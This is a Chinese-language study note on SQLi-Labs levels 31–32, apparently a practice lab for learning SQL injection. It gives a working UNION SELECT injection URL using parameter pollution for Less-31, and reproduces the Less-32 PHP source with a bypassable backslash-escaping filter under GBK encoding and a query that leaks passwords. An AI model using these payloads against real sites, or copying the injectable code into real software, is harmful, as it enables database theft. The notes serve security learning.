SQLi-Labs 学习笔记(Less 31-40)
点击打开链接
Less-31
①先打开网页查看 Welcome Dhakkan
与之前唯一的区别在于:
- $id = '"' .$id. '"';
- $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
直接构建payload:
- http://localhost/sqli-labs-master/Less-31/index.jsp?id=1&id=-2") union select 1,database(),3--+
提示:Less-32,33,34,35,36,37六关全部是针对'和\的过滤
Less-32
①先打开网页查看 Welcome Dhakkan
②查看源代码
Less-32 **Bypass addslashes()**
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- function check_addslashes($string)
- {
- $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash
- $string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
- $string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash
- return $string;
- }
- // take the variables
- if(isset($_GET['id']))
- {
- $id=check_addslashes($_GET['id']);
- //echo "The filtered request is :" .$id . "
"; - //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'ID:'.$id."\n");
- fclose($fp);
- // connectivity
- mysql_query("SET NAMES gbk");
- $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
- $result=mysql_query($sql);
- $row = mysql_fetch_array($result);
- if($row)
- {
- echo '
- echo 'Your Login name:'. $row['username'];
- echo "
"; - echo 'Your Password:' .$row['password'];
- echo "";
- }
- else
- {
- echo '
- print_r(mysql_error());
- echo "";
- }
- }
- else { echo "Please input the ID as parameter with numeric value";}
- ?>
";
";